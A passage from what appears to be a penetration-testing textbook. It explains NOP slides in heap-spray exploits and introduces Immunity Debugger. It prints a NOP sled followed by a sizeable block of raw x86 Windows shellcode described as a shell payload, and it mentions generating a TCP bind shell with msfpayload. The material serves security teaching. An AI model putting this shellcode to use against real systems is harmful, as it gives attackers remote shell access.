background image

112

Chapter 8

Looking at NOPs

Now that you understand the basics of a heap spray and a NOP, let’s take a 
look at a generic NOP slide in an actual exploit. In the following listing, notice 
the hexadecimal representation of 

\x90

, the Intel x86 architecture opcode. 

90

 in Intel x86 assembly is a NOP. Here you see a series of 

\x90

s that create 

our NOP-slide effect. The rest of the code is the payload, such as a reverse 
shell or a Meterpreter shell.

\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90

\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30
\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff
\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2
\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85
\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3
\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d
\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58
\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b
\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff
\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68
\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01
\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50
\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x31
\xdb\x53\x68\x02\x00\x01\xbb\x89\xe6\x6a\x10\x56\x57\x68\xc2
\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5\x53
\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d
\x61\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff
\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58
\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9
\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3

Using Immunity Debugger to Decipher NOP Shellcode

Debuggers

 offer a window into the running state of a program, including 

assembly instruction flow, memory contents, and exception details. Penetra-
tion testers leverage debuggers on a regular basis to identify zero-day vulner-
abilities and to understand how an application works and how to attack it. A 
number of debuggers are out there, but our personal preference going forward 
(and used in later chapters) is Immunity Debugger. We recommend that you 
take a look at the basics of Immunity Debugger before proceeding.

To understand what a NOP slide does, let’s use a debugger to look at how 

the NOP shellcode in the preceding example works. On your Windows XP 
target, download and install Immunity Debugger from 

http://www.immunityinc

.com/

. We’ll use the 

msfpayload

 command to generate sample shellcode for a 

simple TCP bind shell, listening on port 443. As you learned in previous